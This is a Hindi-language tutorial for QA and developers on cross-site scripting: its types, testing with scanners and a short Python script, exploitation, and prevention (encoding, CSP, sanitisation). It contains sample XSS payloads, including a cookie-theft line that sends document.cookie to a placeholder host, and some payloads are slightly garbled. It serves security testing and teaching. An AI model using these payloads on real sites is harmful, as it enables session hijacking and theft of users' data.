क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरियाँ: परीक्षण रणनीतियाँ और उदाहरण

मेरे द्वारा देखे गए आँकड़ों और मेरे अनुभव के अनुसार, XSS कमजोरियाँ वेब अनुप्रयोगों के लिए एक प्रचलित खतरा बनी हुई हैं, जिससे डेटा चोरी, सत्र अपहरण और वेबसाइट समस्याओं का खतरा बना हुआ है। मैंने फैसला किया कि मैं इस भेद्यता प्रकार पर शोध करने में अधिक समय बिता सकता हूं और कम से कम इस अवलोकन-जैसे बुनियादी ज्ञान को आपके साथ साझा कर सकता हूं ताकि कई क्यूए और विकास विशेषज्ञ इस मुद्दे के खिलाफ अपने ऐप्स का परीक्षण करने के कुछ तरीकों को ध्यान में रख सकें। यह आलेख विभिन्न प्रकार के XSS, परीक्षण पद्धतियों और स्वचालन दृष्टिकोणों की पड़ताल करता है और प्रभावी प्रवेश परीक्षण के लिए कुछ उदाहरण और पेलोड प्रदान करता है।

क्रॉस-साइट स्क्रिप्टिंग (XSS) हमलावरों को क्लाइंट-साइड कोड निष्पादन में कमजोरियों का फायदा उठाकर अन्य उपयोगकर्ताओं द्वारा देखे गए वेब पेजों में दुर्भावनापूर्ण स्क्रिप्ट डालने की अनुमति देता है। विभिन्न प्रकार की XSS कमजोरियों को समझना और उचित परीक्षण रणनीतियों का उपयोग करना ऐसे हमलों से सुरक्षित सुरक्षित वेब ऐप्स बनाने के लिए महत्वपूर्ण है।

XSS शोषण तब होता है जब अविश्वसनीय उपयोगकर्ता इनपुट को वेब एप्लिकेशन के भीतर अपर्याप्त रूप से साफ और निष्पादित किया जाता है, जिससे हमलावर अन्य उपयोगकर्ताओं के ब्राउज़र के संदर्भ में दुर्भावनापूर्ण स्क्रिप्ट को इंजेक्ट और निष्पादित कर सकते हैं।

XSS कमजोरियों के प्रकार

प्रतिबिंबित XSS

तब होता है जब उपयोगकर्ता द्वारा प्रदत्त डेटा उचित सत्यापन के बिना प्रतिक्रिया में वापस प्रतिध्वनित हो जाता है।

उदाहरण: <script>alert('XSS_DEMO')</script> एक URL पैरामीटर के माध्यम से इंजेक्ट किया गया।

ये कारनामे तब घटित होते हैं जब कोई वेब एप्लिकेशन उचित स्वच्छता के बिना उपयोगकर्ता के ब्राउज़र पर अमान्य उपयोगकर्ता इनपुट को दर्शाता है। इस हमले में, हमलावर स्क्रिप्ट कोड युक्त एक दुर्भावनापूर्ण यूआरएल तैयार करता है, जिसे पीड़ित द्वारा क्लिक करने पर, कमजोर वेब पेज के संदर्भ में निष्पादित किया जाता है। दुर्भावनापूर्ण स्क्रिप्ट सर्वर पर संग्रहीत नहीं होती है, बल्कि सीधे उपयोगकर्ता के इनपुट से परिलक्षित होती है। प्रतिबिंबित XSS कमजोरियाँ अक्सर फ़िशिंग हमलों में या उपयोगकर्ता के ब्राउज़िंग अनुभव में हेरफेर करने के लिए उपयोग की जाती हैं। प्रभाव गंभीर हो सकता है, कुकी चोरी से लेकर सत्र अपहरण तक।

संग्रहित XSS

दुर्भावनापूर्ण स्क्रिप्ट को सर्वर पर स्थायी रूप से संग्रहीत किया जाता है और अन्य उपयोगकर्ताओं द्वारा एक्सेस किए जाने पर निष्पादित किया जाता है।

उदाहरण: फ़ोरम पोस्ट या सोशल नेटवर्क प्रोफ़ाइल पेज पर टिप्पणी/पोस्ट में संग्रहीत दुर्भावनापूर्ण स्क्रिप्ट।

इसे परसिस्टेंट XSS के रूप में भी जाना जाता है, यह तब उत्पन्न होता है जब कोई हमलावर किसी वेब एप्लिकेशन में दुर्भावनापूर्ण स्क्रिप्ट कोड इंजेक्ट करता है, जिसे बाद में सर्वर साइड पर संग्रहीत किया जाता है। जब भी कमजोर पेज अन्य उपयोगकर्ताओं द्वारा एक्सेस किया जाता है तो इस इंजेक्टेड स्क्रिप्ट को बाद में पुनर्प्राप्त और निष्पादित किया जाता है। संग्रहीत XSS हमले विशेष रूप से खतरनाक होते हैं क्योंकि इंजेक्ट की गई स्क्रिप्ट समय के साथ बनी रहती है, संभावित रूप से कई उपयोगकर्ताओं को प्रभावित करती है और व्यापक शोषण का कारण बनती है। हमलावर आमतौर पर अपने दुर्भावनापूर्ण पेलोड को निष्पादित करने के लिए उपयोगकर्ता-जनित सामग्री जैसे टिप्पणियाँ, फ़ोरम पोस्ट, संस्थाओं के नाम को लक्षित करते हैं जो वेब पेजों या प्रोफ़ाइल फ़ील्ड पर प्रदर्शित होते हैं। संग्रहीत XSS के परिणामों में डेटा चोरी, खाता अधिग्रहण और वेबसाइट विरूपण शामिल हो सकता है, जो उपयोगकर्ताओं और प्रभावित संगठन दोनों के लिए महत्वपूर्ण जोखिम पैदा कर सकता है।

DOM-आधारित XSS

स्क्रिप्ट निष्पादन क्लाइंट पक्ष पर DOM के हेरफेर पर निर्भर करता है।

उदाहरण: जेएस कोड यूआरएल हैश से उपयोगकर्ता-नियंत्रित डेटा को पुनर्प्राप्त और निष्पादित करता है।

यह तब होता है जब एक वेब एप्लिकेशन असुरक्षित तरीके से अविश्वसनीय उपयोगकर्ता इनपुट के आधार पर DOM में गतिशील रूप से हेरफेर करता है। पारंपरिक XSS हमलों के विपरीत, जिसमें सर्वर-साइड प्रोसेसिंग शामिल होती है, DOM-आधारित XSS पूरी तरह से क्लाइंट साइड पर प्रकट होता है। हमलावर पीड़ित के ब्राउज़र के भीतर मनमाना कोड निष्पादित करने के लिए क्लाइंट-साइड स्क्रिप्ट में हेरफेर करके DOM-आधारित XSS का शोषण करते हैं। इस प्रकार के XSS का पता लगाना और उसे कम करना अक्सर कठिन होता है, क्योंकि भेद्यता क्लाइंट-साइड कोड के भीतर रहती है और सर्वर-साइड परीक्षण के दौरान स्पष्ट नहीं हो सकती है। DOM-आधारित XSS हमलों से विभिन्न परिणाम हो सकते हैं, जिनमें सत्र अपहरण, डेटा घुसपैठ और उपयोगकर्ता की ओर से अनधिकृत गतिविधियां शामिल हैं, जो क्लाइंट-साइड सुरक्षा उपायों और सतर्क वेब ऐप विकास प्रथाओं के महत्व पर प्रकाश डालती हैं।

स्व-एक्सएसएस

यह एक सोशल इंजीनियरिंग हमला है जहां एक हमलावर उपयोगकर्ता को अपने ब्राउज़र के भीतर दुर्भावनापूर्ण कोड निष्पादित करने के लिए प्रेरित करता है। कई उपयोगकर्ताओं को लक्षित करने वाले पारंपरिक XSS हमलों के विपरीत, सेल्फ-XSS अपने सत्र के भीतर कोड निष्पादित करने के लिए उपयोगकर्ता के भरोसे का फायदा उठाता है। आमतौर पर, हमलावर पीड़ितों को हानिरहित कार्रवाई की आड़ में उनके ब्राउज़र के डेवलपर कंसोल या वेबसाइट के कुछ क्षेत्रों में मासूम दिखने वाले जेएस कोड को चिपकाने का लालच देते हैं, जैसे किसी सुविधा को अनलॉक करना या पुरस्कार अर्जित करना। एक बार निष्पादित होने के बाद, इंजेक्ट किया गया कोड संभावित रूप से पीड़ित के खाते से समझौता कर सकता है, संवेदनशील जानकारी चुरा सकता है, या उनकी ओर से अनधिकृत कार्य कर सकता है। पीड़ित के सत्र तक सीमित होने के बावजूद, सेल्फ-एक्सएसएस एक खतरा बना हुआ है, जो ऐसी भ्रामक रणनीति को पहचानने और उससे बचने के लिए उपयोगकर्ता शिक्षा और जागरूकता के महत्व पर जोर देता है।

परिक्षण

स्वचालन

• XSS के लिए स्वचालित स्कैन के लिए सुरक्षा परीक्षण उपकरण जैसे OWASP ZAP, बर्प सुइट, XSStrike, PwnXSS, XSSer, Acunetix आदि का उपयोग करें।
• एप्लिकेशन को क्रॉल करने, इनपुट वैक्टर की पहचान करने और XSS कमजोरियों का पता लगाने के लिए पेलोड इंजेक्ट करने के लिए टूल कॉन्फ़िगर करें।
• पहचानी गई कमजोरियों के लिए स्कैन परिणामों का विश्लेषण करें, उन्हें मैन्युअल रूप से पुन: प्रस्तुत करें, पीओसी बनाएं, संभावित प्रभाव को समझें और मुद्दों को ठीक करने को प्राथमिकता दें।

आप कुछ स्क्रिप्ट लिख सकते हैं; मैं पाइथॉन पसंद करता हूं, उदाहरण के लिए:

 import requests def test_xss(url, parameter): payloads = [ "<script>alert('XSS')</script>", "<img src=x onerror=alert(1)>", # list of your payloads ] for payload in payloads: modified_url = f'{url}?{parameter}={payload}' response = requests.get(modified_url) if payload in response.text: print(f'Potential XSS detected here - {modified_url}') # example test_xss("https://testwebsite.com/search", "query_param_name")

मैन्युअल परीक्षण

• XSS इंजेक्शन के प्रति संवेदनशील इनपुट वैक्टर की पहचान करें (उदाहरण के लिए, इनपुट फ़ील्ड, यूआरएल पैरामीटर)। आप वैक्टर की अधिक कुशलता से पहचान करने के लिए क्रॉलर और स्निफ़र्स का उपयोग कर सकते हैं।
• XSS कमजोरियों (उदाहरण के लिए, स्क्रिप्ट टैग, इवेंट हैंडलर) का फायदा उठाने के लिए क्राफ्ट पेलोड।

यह निर्धारित करने के लिए प्रतिक्रियाओं का विश्लेषण करें कि पेलोड प्रतिबिंबित होते हैं या निष्पादित होते हैं। पीओसी बनाएं, संभावित प्रभाव को समझें और मुद्दों को ठीक करने को प्राथमिकता दें।

कदम:

1. अपने ऐप के इनपुट फ़ील्ड में एक स्क्रिप्ट टैग और उसके बाद कुछ जेएस कोड दर्ज करें।

   उदाहरण के लिए, बुनियादी XSS पेलोड:

    <script>alert('XSS');</script> (%0ejavascript:alert(/XSS/)) <script>alert('XSS')</script> // Display alert dialog with 'XSS' message. <img src=x onerror=alert(((123)> // Load broken image, trigger alert with '123'. // Cookie Theft Payload: <img src="http://website.com/stealcookie?cookie="+document.cookie> // Sends victim's cookies to attacker-controlled server. // DOM-based XSS Payload: #"><img src=x onerror=alert(123)> // Exploits DOM manipulation, triggers alert on vulnerable pages.

2. इनपुट सबमिट करें और देखें कि स्क्रिप्ट निष्पादित होती है या नहीं।

3. यदि ऐसा होता है, तो एप्लिकेशन XSS हमलों के प्रति संवेदनशील है।

4. यदि स्क्रिप्ट निष्पादित नहीं होती है, तो अन्य HTML टैग, जैसे <img> या <iframe> जोड़कर इनपुट को संशोधित करने का प्रयास करें , और देखें कि क्या वे पृष्ठ पर प्रतिबिंबित होते हैं, उदाहरण के लिए (यह लगभग हमेशा मेरे लिए काम करता है):

   <b>t</b>#`"/*—est

5. आप अपने वेब ऐप यूआरएल या उपयोगकर्ता नाम, अपलोड किए गए फ़ाइल नाम , या ऐप पेज पर प्रदर्शित होने वाले किसी भी टेक्स्ट के क्वेरी पैरामीटर में एक स्क्रिप्ट जोड़ सकते हैं जिसे आप बदल सकते हैं।

6. इनपुट के फ्रंट-एंड सत्यापन से अवगत रहें। हमेशा सीधे अनुरोध (पोस्टमैन, बर्प, या किसी समान उपकरण का उपयोग करके) का उपयोग करके मूल्य सबमिट करने का प्रयास करें।

7. डेव टूल्स में ब्राउज़र कंसोल की जांच करें क्योंकि कभी-कभी आपको पृष्ठ पर कोई दृश्य परिवर्तन नहीं दिख सकता है, लेकिन कुछ प्रतीक, जैसे `"/*— पृष्ठ के JS/HTML को तोड़ सकते हैं, और आपको कंसोल में एक चेतावनी दिखाई देगी जो हो सकती है यह आपके लिए एक संकेत है कि XSS PoC प्राप्त करने के लिए अपने पेलोड को कैसे संशोधित करें

फ़ज़िंग और पेलोड की सूची का उपयोग करें - जब संभव हो तो इस दृष्टिकोण को स्वचालित करें या इसके लिए विशेष उपकरणों का उपयोग करें।

व्यक्तिगत रूप से, मुझे यहां से पेलोड और जानकारी का उपयोग करना पसंद है, मेरी राय में, यह एक बहुत ही उपयोगी संसाधन है।

ब्लैक-बॉक्स परीक्षण

• XSS इंजेक्शन के प्रति संवेदनशील इनपुट वैक्टर की पहचान करना।
• प्रभाव का आकलन करने और कमजोर बिंदुओं की पहचान करने के लिए XSS पेलोड को तैयार करना और इंजेक्ट करना।

ग्रे-बॉक्स परीक्षण

• संभावित XSS के लिए स्रोत कोड और स्वच्छता प्रक्रियाओं का विश्लेषण।
• लक्षित परीक्षण के लिए एप्लिकेशन के आंशिक ज्ञान का लाभ उठाना।

एक्सएसएस का शोषण

एक्सएसएस पीओसी

• मनमाना JS निष्पादित करने वाले पेलोड को इंजेक्ट करके XSS भेद्यता की पुष्टि करना प्रदर्शित करता है।
• संस्करण 92 के बाद क्रोम ब्राउज़र के लिए print() फ़ंक्शन जैसे वैकल्पिक पेलोड का उपयोग करना।

उन्नत XSS शोषण

• कुकीज़ चुराने, सत्र अपहरण करने, या मनमाना कोड निष्पादित करने के लिए।
• उपयोगकर्ताओं का प्रतिरूपण करने, क्रेडेंशियल कैप्चर करने या वेब पेजों को विकृत करने के लिए।

XSS फ़िल्टर को बायपास करना

• टैग विशेषता मान सम्मिलन, ऑबफस्केशन और HTTP पैरामीटर प्रदूषण (HPP) जैसी विभिन्न तकनीकों के माध्यम से सामान्य XSS फ़िल्टर से बचना।
• उदाहरण परिदृश्य XSS पेलोड को सफलतापूर्वक निष्पादित करने के लिए फ़िल्टर तंत्र को दरकिनार करते हुए प्रदर्शित किए जा रहे हैं।

रोकथाम तकनीक

इनपुट सत्यापन और आउटपुट एन्कोडिंग

• यह सुनिश्चित करने के लिए इनपुट सत्यापन तंत्र (एफई और बीई) लागू करें कि उपयोगकर्ता द्वारा प्रदत्त डेटा अपेक्षित प्रारूपों के साथ ठीक है और इसमें दुर्भावनापूर्ण कोड नहीं है।
• सभी उपयोगकर्ता इनपुट को संसाधित या संग्रहीत करने से पहले सर्वर साइड पर उन्हें स्वच्छ और मान्य करें।
• ब्राउज़र द्वारा सक्रिय सामग्री के रूप में व्याख्या किए जाने से रोकने के लिए आउटपुट डेटा को उचित रूप से एन्कोड करें।
• आउटपुट डेटा के संदर्भ के आधार पर HTML इकाई एन्कोडिंग, यूआरएल एन्कोडिंग और जेएस एस्केपिंग जैसी एन्कोडिंग तकनीकों का उपयोग करें।

सामग्री सुरक्षा नीति (सीएसपी)

• वेब एप्लिकेशन के भीतर स्क्रिप्ट, स्टाइलशीट और अन्य संसाधनों के निष्पादन के संबंध में सुरक्षा नीतियों को परिभाषित करने और लागू करने के लिए सामग्री सुरक्षा नीति (सीएसपी) हेडर लागू करें। सीएसपी प्रशासकों को उन स्रोतों को प्रतिबंधित करने की अनुमति देता है जहां से स्क्रिप्ट लोड की जा सकती हैं, अनधिकृत स्क्रिप्ट के निष्पादन को रोककर XSS हमलों के जोखिम को कम किया जा सकता है।
• विश्वसनीय डोमेन, इनलाइन स्क्रिप्ट और स्टाइल उपयोग, और स्क्रिप्ट नॉन्स को निर्दिष्ट करने के लिए सीएसपी निर्देशों को कॉन्फ़िगर करें, जिससे एक्सएसएस के लिए हमले की सतह को प्रभावी ढंग से कम किया जा सके।

प्रसंग-विशिष्ट आउटपुट एन्कोडिंग

उस संदर्भ के आधार पर डेटा को एन्कोड करें जिसमें आउटपुट डेटा प्रस्तुत किया जा रहा है। XSS के विरुद्ध व्यापक सुरक्षा सुनिश्चित करने के लिए HTML, JS, CSS और अन्य संदर्भों के लिए अलग-अलग एन्कोडिंग विधियाँ लागू करें।

उदाहरण के लिए , स्क्रिप्ट इंजेक्शन को रोकने और विभिन्न आउटपुट संदर्भों में डेटा अखंडता बनाए रखने के लिए HTML सामग्री के लिए HTML इकाई एन्कोडिंग, इनलाइन स्क्रिप्ट संदर्भों के लिए जावास्क्रिप्ट एस्केपिंग और स्टाइल विशेषताओं के लिए सीएसएस एस्केपिंग का उपयोग करें।

इनपुट व्हाइटलिस्टिंग और ब्लैकलिस्टिंग

अनुमत और निषिद्ध वर्णों, पैटर्न या सामग्री प्रकारों की पूर्वनिर्धारित अनुमति सूचियों और अस्वीकृत सूचियों के आधार पर उपयोगकर्ता इनपुट को फ़िल्टर और मान्य करने के लिए इनपुट व्हाइटलिस्टिंग और ब्लैकलिस्टिंग लागू करें।

• श्वेतसूची में अपेक्षित इनपुट प्रारूपों को स्पष्ट रूप से परिभाषित करना और इन विशिष्टताओं के अनुरूप नहीं होने वाले किसी भी इनपुट को अस्वीकार करना शामिल है।
• ब्लैकलिस्टिंग ज्ञात दुर्भावनापूर्ण इनपुट या पैटर्न की पहचान करती है और उन्हें ब्लॉक कर देती है, हालांकि एन्कोडिंग या ओफ़्स्क्यूशन तकनीकों के माध्यम से चोरी की संभावना के कारण यह कम प्रभावी हो सकता है ।

सुरक्षा शीर्षलेख और स्वच्छता पुस्तकालय

• वेब ऐप सुरक्षा में सुधार करने और XSS सहित विभिन्न आक्रमण वैक्टरों को रोकने के लिए X-XSS-प्रोटेक्शन, X-कंटेंट-टाइप-ऑप्शंस और X-फ़्रेम-ऑप्शंस जैसे सुरक्षा हेडर का उपयोग करें।
• इनपुट सत्यापन, आउटपुट एन्कोडिंग और अन्य सुरक्षा-महत्वपूर्ण कार्यों को स्वचालित करने के लिए विकास स्टैक में तृतीय-पक्ष स्वच्छता पुस्तकालयों और ढांचे को एकीकृत करें। उभरते खतरों और कमजोरियों को प्रभावी ढंग से संबोधित करने के लिए इन पुस्तकालयों को नियमित रूप से अद्यतन और बनाए रखें ।

सुरक्षित विकास अभ्यास और सुरक्षा जागरूकता

• डेव और क्यूए टीमों के भीतर सुरक्षित विकास प्रथाओं को बढ़ावा देना, सुरक्षित कोड लिखने, संपूर्ण कोड समीक्षा करने और सॉफ्टवेयर विकास जीवनचक्र के दौरान सुरक्षा परीक्षण करने के महत्व पर जोर देना।
• डेवलपर्स, क्यूए इंजीनियरों और अन्य हितधारकों के बीच सुरक्षा जागरूकता की संस्कृति को बढ़ावा देना, एक्सएसएस और अन्य कमजोरियों, शोषण तकनीकों और निवारक उपायों के बारे में निरंतर सीखने और ज्ञान साझा करने को प्रोत्साहित करना।
• टीम के सदस्यों को XSS को प्रभावी ढंग से पहचानने, निपटने और रोकने के लिए आवश्यक कौशल और विशेषज्ञता से लैस करने के लिए चल रहे प्रशिक्षण कार्यक्रमों, पाठ्यक्रमों, सेमिनारों, सम्मेलनों और संसाधनों में निवेश करें।

XSS वेब ऐप्स के लिए लगातार खतरा पैदा करता है, डेटा उल्लंघनों और उपयोगकर्ता के विश्वास को खतरे में डालता है। प्रभावी शमन के लिए XSS प्रकार और परीक्षण विधियों को समझना महत्वपूर्ण है। इनपुट सत्यापन, आउटपुट एन्कोडिंग और सीएसपी कार्यान्वयन जैसी रोकथाम तकनीकें ऐप सुरक्षा में सुधार करती हैं। सुरक्षा प्रथाओं और सहयोग को प्राथमिकता देकर, टीमें अपने ऐप्स को XSS से सुरक्षित रख सकती हैं और पर्याप्त वेब ऐप सुरक्षा सुनिश्चित कर सकती हैं।

यदि आप नौसिखिया हैं और साइबर सुरक्षा और प्रवेश परीक्षण में रुचि रखते हैं या इसे और अधिक सुरक्षित बनाने के लिए अपने ऐप में सुधार करना चाहते हैं, तो आप इन विषयों पर मेरे लेख पढ़ सकते हैं:

• https://hackernoon.com/wlnerability-scanners-essentials
• https://hackernoon.com/cybersecurity-essentials-practical-web-app-security-testing-tips-for-qa-engineers
• https://hackernoon.com/defending-your-web-app-a-guide-to-rate-limiting-and-brute-force-attack-prevention

XSS और पेलोड के बारे में अधिक जानकारी के लिए, आप निम्नलिखित संसाधन पा सकते हैं:

• https://owasp.org/www-community/attacks/xss/
• https://portswigger.net/web-security/cross-site-scripting/cheat-शीट
• https://gist.github.com/kuro Beats/9a613c9ab68914312cbb415134795b45

एक महत्वपूर्ण अनुस्मारक: